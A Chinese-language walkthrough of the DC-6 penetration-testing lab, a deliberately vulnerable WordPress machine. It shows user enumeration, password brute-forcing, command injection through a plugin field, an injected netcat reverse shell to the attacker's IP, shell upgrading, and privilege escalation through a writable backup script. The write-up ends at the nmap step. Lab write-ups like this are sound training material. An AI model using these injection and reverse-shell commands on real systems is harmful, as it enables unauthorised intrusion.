前言

  • 名称:DC:6

环境部署

  • 虚拟化:VMware Workstation
  • 网卡:NAT

攻击机

  • IP 192.168.8.129
  • Kali Linux 25.3

靶机

  • DC-6
  • IP 192.168.8.131

渗透流程

主机发现

端口扫描

访问

访问会跳转到wordy

编辑/etc/hosts

其余信息收集

由于也是WordPress网站,我们依旧使用wpscan扫描

扫出几个用户

网页密码爆破

找到mark 密码是helpdesk01

登录成功

发现一个插件功能

那么查询功能可能存在命令执行

1
127.0.0.1 | ls

当我想列出用户名的时候,发现输入框应该有长度限制,但是应该只是前端的

修改这里的maxlength

我直接删除掉了

开一个nc监听

1
127.0.0.1 | nc -e /bin/bash 192.168.8.129 9999

进入交互模式

1
python -c 'import pty;pty.spawn("/bin/bash")'

发现mark用户下的stuff里,有一个things-to-do.txt

找到一个,添加了graham用户密码为GSo7isUM1D4

先

ssh登录成功

backups.sh,属主是jens,属组是devs,也就是只要是这个属组和属主,都可以去读写执行,其他的用户只能读取和执行。

那么如果echo "/bin/bash" >> /home/jens/backups.sh

切换到jens后,发现有nmap可以提权